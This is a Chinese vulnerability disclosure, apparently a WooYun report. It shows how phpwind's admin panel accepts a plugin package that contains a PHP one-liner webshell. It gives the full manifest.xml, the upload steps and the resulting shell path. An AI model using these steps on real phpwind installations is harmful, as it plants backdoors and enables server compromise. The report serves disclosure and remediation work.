### 简要描述:
### 详细说明:
后台上传插件处,可以上传一个包含php木马的phpwind标准格式插件安装包,并可getshell.
1.先制作一个安装包,需要包含一个manifest.xml文件和一个php一句话(此处文件名为php.php)。
manifest.xml如下:
```
<?xml version="1.0" encoding="gbk"?>
<manifest>
<application>
<name>getshell</name>
<alias>getshell</alias>
<version>1.0</version>
<pw-version>1.0</pw-version>
<type>app</type>
<description>getshell
</description>
<charset>gbk</charset>
<website>http://wooyun.org</website>
<author-name>VIP@wooyun</author-name>
<author-email>root@wooyun.org</author-email>
<author-icon>http://wooyun.org</author-icon>
</application>
<res>res</res>
</manifest>
```
将以上文件打包成zip格式。
2.在后台 云平台-》应用管理-》本地安装处上传制作好的安装包,并点击安装。
[<img src="https://images.seebug.org/upload/201306/11135759d93f1a6dfd627d9feb190542723e48a0.jpg" alt="p1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201306/11135759d93f1a6dfd627d9feb190542723e48a0.jpg)
3.shell为http://127.0.0.1/phpwind/src/extensions/getshell/php.php
[<img src="https://images.seebug.org/upload/201306/11140130f797a526481f3c48c8eea34655242d38.jpg" alt="p2.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201306/11140130f797a526481f3c48c8eea34655242d38.jpg)
### 漏洞证明:
[<img src="https://images.seebug.org/upload/201306/11140130f797a526481f3c48c8eea34655242d38.jpg" alt="p2.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201306/11140130f797a526481f3c48c8eea34655242d38.jpg)
暂无评论